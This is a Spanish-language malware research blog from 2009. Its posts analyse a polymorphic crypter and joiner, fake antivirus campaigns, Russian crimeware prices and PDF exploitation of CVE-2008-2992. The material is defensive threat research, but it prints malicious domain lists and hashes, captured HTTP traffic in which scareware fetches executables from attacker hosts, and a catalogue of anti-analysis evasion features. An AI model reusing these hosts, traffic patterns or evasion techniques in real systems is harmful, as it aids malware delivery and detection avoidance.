Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

lunes, 23 de marzo de 2009

Automatización de procesos antianálisis a través de crimeware

La automatización de códigos maliciosos constituye una filosofía de vida y un negocio redondo para sus creadores ya que día a día deben enfocar sus esfuerzos en idear nuevas "herramientas" que permitan "saltar" los métodos de detección propuestos por las firmas antivirus.

Tal es así que constantemente aparecen nuevas "propuestas", cada vez más profesionalizadas, que ayudan a demorar la detección de códigos maliciosos a través de técnicas antianálisis y, al mismo tiempo, aumentar las ganancias de sus desarrolladores.

CRUM Cryptor Polymorphic es uno de los tantos programas que forman parte de esta categoría. Es un programa utilizado en ambientes maliciosos para cifrar malware; desarrollo en Rusia por personas que se encuentran en el lado malicioso del campo para ampliar el horizonte de ganancias; y el cual he mencionado de manera superficial al referirme al crimeware ruso.

Se trata de una nueva versión de este crypter, exactamente la 1.1, que ofrece capacidades polimórficas para la manipulación de código dañino.

Entre las características polimórficas que propone la aplicación se encuentran, además del mismo polimorfismo:
  • Uso de registros aleatorios
  • Cifrado de importaciones y recursos
  • Códificación de 128 para cada sección
  • Sobreescritura de los campos "Rich" y "Time/Date Stamp" de la cabecera de los archivos
  • Ofrece capacidades antidebugger
  • Evita que se lleve a cabo un volcado de memoria
  • Evitar ejecución en entornos controlados
  • Cambiar o borra el icono del binario malicioso
Aquí sólo se reúnen sólo algunas de las funcionalidades ofrecidas por el programa, pero suficientes para determinar que el grado de profesionalismo y peligrosidad alcanzado, en este caso por desarrolladores rusos, en la creación de aplicaciones maliciosas es preocupante.

Esta aplicación cuesta U$S 100 en el mercado negro. Sin embargo, para completar el arsenal de aplicaciones de este estilo, el mismo creador ofrece por "sólo" U$S 50 un joiner (utilizado la fusión de archivos) llamado CRUM Joiner Polymorphic y por U$S 20 se accede a las actualizaciones del mismo.

La interfaz de este programa, que permite fusionar varios archivos como por ejemplo, a un .jpg fusionarle un binario .exe, se ve de la siguiente manera:

En este caso, algunas de las características que incorpora la aplicación son:
  • Capacidades polimórficas
  • Permite la unión de ilimitados archivos
  • Soporta varias extensiones de archivos como .doc, .mp3, .avi, .jpg, .bmp y .exe
  • Cifrado de archivos de 256 bytes
  • Capacidad de ejecutar no sólo archivos .exe sino que también archivos .dll
En ambos casos, el creador recomienda algunas "medidas de seguridad" para resguardar la "integridad" del desarrollo como no someter la aplicación a servicios como virustotal, ser ordenado al cifrar los archivos y no compartir ninguno de los componentes que constituyen las aplicaciones.

Información relacionada
Los precios del crimeware ruso
Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades
Creación Online de malware polimórfico basado en PoisonIvy

# pistus

Ver más

Publicado por Jorge Mieres 1 comentarios

viernes, 13 de marzo de 2009

Campaña de infección scareware a través de falso explorador de Windows

Las estrategias de engaño son la principal característica que emplea el scareware para generar temor en el usuario y lograr la ejecución de su instalador. Si bien las excusas que se emplean para los engaños son muchas, algunas más llamativas que otras, cada vez se percibe más un claro aumento de los esfuerzos por idear y crear estrategias más sofisticadas.

En este caso, el engaño se encuentra focalizado en presentar un scaneo online del equipo que siempre termina encontrando problemas de infección, ofreciendo la descarga de la supuesta herramienta de seguridad que solucionará los problemas. Todo completamente falso.

Cuando el usuario accede por primera vez a la página maliciosa, una alerta advierte sobre la potencial posibilidad de que nuestro equipo haya sido víctima de códigos maliciosos.

En este momento se produce la simulación de un scaneo del equipo que es representado a través de un falso explorador de windows y un gif animado que muestra la barra de progreso indicando el avance del scan, para luego desplegar una ventana emergente con la nomenclatura de las supuestas amenazas encontradas en el sistema.

Esta imagen, que ofrece dos opciones ("Remove all" y "Cancel") constituye otra capa del engaño, ya que sin importar en que sector de la imagen se haga clic, produce el mismo efecto: descarga el instalador del malware. Un archivo llamado install.exe cuyo MD5 es 8eed59709de00e8862d6ce3d5e19cb4a.

Algunas de las direcciones web que se encuentran activamente explotando esta actividad maliciosa son:

stabilityaudit.com (209.44.126.22)
websscan.com
goscanbay.com (78.159.101.27)
goanyscan.com
goscanever.com
goscanfuse.com
goscanit.com
goscanonly.com
goscanslot.com
gowayscan.com
in4co.com
in4ik.com
megascan4.com
www.goscanonly.com
www.homescan4.com
easywinscanner17.com (209.249.222.48)
fast-antimalware-scanner.com (194.165.4.7)
fastantimalwarescan.com (78.47.91.153)

Sin embargo, el profesionalismo que buscan sus creadores se va perfeccionando intentando cubrir la mayor cantidad de "público" posible desplegando la estrategia de infección en varios idiomas.

Incluso, descargando variantes del mismo malware. De esta manera, los creadores del scareware intentan cubrir los dos idiomas más empleados a nivel mundial como lo son el inglés y el español.

Ver más

Publicado por Jorge Mieres 0 comentarios

miércoles, 11 de marzo de 2009

Los precios del Crimeware ruso

Al ver la cantidad de dominios rusos creados para diseminar malware, y la gran variedad de aplicaciones diseñadas desde aquellas tierras para cometer diferentes tipos de delitos que buscan quedarse con la mercancía más valiosa: la información; imagino a Rusia como si fuese algo parecido al mundo que describe Gibson en Neuromante donde viejas callejuelas oscuras son utilizadas para la venta y alquiler clandestino de todo tipo de programas diseñados para romper las protecciones de seguridad.

Los delincuentes informáticos y el mercado negro de crimeware parecería estar a la orden del día en Rusia. Con lo cual, quiero reflejar algunos números que dan una idea de lo que puede llegar a costar preparar ataques a través de un importante número de “recursos” disponibles, como diría un mercenario, al mejor postor.

Sploit 25
Es un crimeware que contiene diferentes exploit para vulnerabilidades en Internet Explorer 6 y 7, y en archivo PDF. Existe una versión Lite cuyo valor es de U$S 1500 y U$S 2500 la versión Pro.

Unique Sploits Pack
Otro crimeware que contiene varios exploits para diferentes vulnerabilidades. Su valor es de U$S 600. Por U$S 100 se accede a las actualizaciones y por U$S 50 al un módulo de cifrado.

Neon Exploit System
Un conjunto de exploits diseñados para explotar las vulnerabilidades en plataformas Microsoft y diferentes aplicativos de uso masivo. El valor de este crimeware es de U$S 500.

XS[S]hkatulka
Conjunto de script diseñados para romper contraseñas de webmails a través de XSS. Según sus creadores, la aplicación “es ideal para comenzar a ganar dinero mediante la prestación de servicios para obtener las contraseñas de las cuentas de correo. Como el investigador de Investigaciones Informáticas. :-) Su valor es de U$S 110.

Cripta Zeus(a)
Es un servicio cuyo fin es cifrar los troyanos que reclutan zombies PC’s para la botnet Zeus. Los “servicios” ofrecidos son:
  • Construir criptas individuales (your.exe) la primera vez: U$S 49
  • Construir criptas individuales (your.exe) cifrar cada dos horas: U$S 46
  • Construir criptas individuales (your.exe) cifrar cada tres horas: U$S 43
Le Fiesta Pack
Uno de los crimeware más conocidos. Al igual que otros programas similares, se encuentra escrito en PHP y es utilizado para explotar vulnerabilidades a través de técnicas como Drive-by-Download, Scripting, etc. Actualmente es utilizado por la botnet Zeus. El precio de la última versión es de U$S 1000.

YES Exploit System
Otro crimeware diseñado para explotar vulnerabilidades a través de exploit y scripts. Su valor es de U$S 600.

PoisonIvy Polymorphic Online Builder
Crimeware para generar variantes del troyano PoisonIvy en línea. Su valor es de U$S 500.

FriJoiner Small y Private
Una aplicación desarrollada para fusionar archivos ejecutables. Este tipo de aplicaciones es ampliamente utilizada por los diseminadores de malware para evitar que el código malicioso sea detectado. La versión Small cuesta U$S 10 y la versión Private U$S 15.





Genom iframer
Aplicativo diseñado para automatizar la inyección de etiquetas iframe en sitios vulnerables. Su valor es de U$S 40.

CRUM Cryptor Polymorphic
Cripter con características polimórficas pensado para evitar la detección de malware por parte de las compañías antivirus. Su costo de de U$S 100. Esta es sólo una pequeña lista que representa un porcentaje ínfimo comparado con la cantidad y variedad de aplicaciones crimeware.

La mayoría de los ataques que utilizan Internet como base para atacar se llevan a cabo con programas de este estilo; sin embargo, debemos ser concientes que mientras más informados nos encontremos y mejor utilicemos las tecnologías de seguridad, mayor será el nivel de protección en nuestros entornos de información.

Información relacionada
Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades
Creación Online de malware polimórfico basado en PoisonIvy

# pistus

Ver más

Publicado por Jorge Mieres 2 comentarios

lunes, 9 de marzo de 2009

Estrategia de infección agresiva de XP Police Antivirus. Segunda parte

Desde el momento que se produce la infección de XP Police Antivirus, el usuario comenzará a visualizar en pantalla una serie de ventanas emergentes de alertas sobre falsas infecciones, entre otras.

Pero de manera completamente transparente, se van produciendo una serie de acciones tendientes a completar la obra del scareware.

A través de la escucha del tráfico, vemos la descarga de los siguientes componentes:
GET /setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com
Descarga setup.dat que no es un archivo de datos sino que es un archivo comprimido que guarda una copia de los otros archivos que se descomprimen en C:\Archivos de programa\XPPoliceAntivirus.
GET /sysupdate.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com
Descarga sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0) es utilizado para comprimir el malware en tiempo de ejecución para intentar evitar su detección por parte de programas antivirus.
GET /svchost32.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:47:46 GMT
Content-Type: application/octet-stream
Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT
Accept-Ranges: bytes
Content-Length: 2746314
Connection: Keep-Alive
Age: 0

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
GET /land.txt HTTP/1.1
User-Agent: wget 3.0
Host: xp-police-09.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:51:15 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT
ETag: "3a58001-1-bd70a300"
Accept-Ranges: bytes
Content-Length: 1
Connection: Keep-Alive
Age: 0

2
GET /js/window.js HTTP/1.1
Accept: */*
Referer: http://www.xp-police-09.com/installed.php?id=108
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108
El JavaScript windows.js despliega en pantalla la ventana pop-up con la leyenda Thank you for Installation!


GET /buy.php?id=108 HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108
Esta es la página de compra del scareware desde donde se solicita información sensible y financiera de la víctima. Es un scam/phishing.

Las maniobras empleadas por los códigos maliciosos son cada vez más agresivas y eficaces en cuanto a sus acciones ya que, como se pudo apreciar, el instalador que se descarga en primera instancia, es sólo una parte del rompecabezas desde el cual el scareware obtiene las demás piezas.

Información relacionada
Estrategia de infección agresiva de XP Police Antivirus
Campaña de propagación de XP Police Antivirus a través de Ingeniería Social Visual
Una recorrida por los últimos scareware IV

# pistus

Ver más

Publicado por Jorge Mieres 0 comentarios

sábado, 7 de marzo de 2009

Explotación de vulnerabilidades a través de archivos PDF

Explotar debilidades en determinadas aplicaciones de uso masivo, es en la actualidad uno de los vectores de ataque por malware más empleados; y en este sentido ya he posteado la explotación de vulnerabilidades varias a través de SWF y JS.

En este caso, el objetivo del atacante es encontrar equipos con Adobe Acrobat y Adobe Reader vulnerables a un ataque de Desbordamiento de Búfer (Buffer Overflow), descrito en CVE-2008-2992.

La cuestión es que, un ejemplo concreto lo constituye la dirección http://prororo7.net/sp/index .php. Al acceder a esta URL maliciosa, no se visualiza absolutamente nada pero, en segundo plano, el código exploit explotará el error mencionado en caso de encontrarlo.

En este ejemplo, se descarga y ejecuta de manera remota y arbitraria un malware a través del archivo f.pdf (MD5: 2de9de23f9db1e7b1e39d0481a372399) empleando la función util.printf de Java Script.

El código malicioso se manifiesta bajo el nombre load.exe (MD5: a6e317f29966fa9e2025f29c7d414c0a) y es descargado desde http://prororo7 .net/sp/l.php?b=4&s=P.

Lamentablemente, el archivo PDF es constantemente manipulado por quienes lo propagan para evitar la detección por parte de los programas antivirus, y porqué digo "lamentablemente", por que el índice de detección que este PDF malicioso posee hasta el momento es extremadamente bajo. Tal cual lo podemos observar en el reporte que devuelve VirusTotal, sólo cinco (5) compañías AV de un total de 39 previenen su infección.

Una situación similar se da con el archivo doc.pdf (MD5: 5fa343ebca2dd5a35b38644b81fe0485) que es llamado desde http://toureg-cwo .ch/fta/index.php, y que descarga el archivo 1.exe (MD5: 5c581054fbce67688d2666ac18c7f540) cuya tasa de detección es aún más baja que el anterior (4/39).

Muchas son las direcciones web que se están utilizando de manera activa para propagar malware:

tozxiqud .cn/nuc/spl/pdf .pdf
teirkmm .net/nuc/spl/pdf .pdf
hayboxiw .cn/nuc/spl/pdf .pdf
www.ffseik .com/nuc/spl/pdf .pdf
www.kuplon .biz/smun/pdf .php?id=2435&vis=1
www.geodll .biz/ar/spl/pdf.pdf
setcontrol .biz/ar/spl/pdf .pdf
newprogress .tv/fo/spl/pdf .pdf
eddii .ru/traffic/sploit1/getfile .php?f=pdf
google-analytics.pbtgr .ru/pdf .php?id=48462
hardmoviesporno .com/rf/exp/update1 .pdf

Como verán, las probabilidades de ser víctimas de este tipo de estrategias de infección es alta; en consecuencia, es de suma importancia parchear lo antes posible, quienes utilicen, las aplicaciones de Adobe.

Información relacionada
Explotando vulnerabilidades a través de SWF
Explotación de vulnerabilidades a través de JS

# pistus

Ver más

Publicado por Jorge Mieres 0 comentarios

Suscribirse a: Entradas (Atom)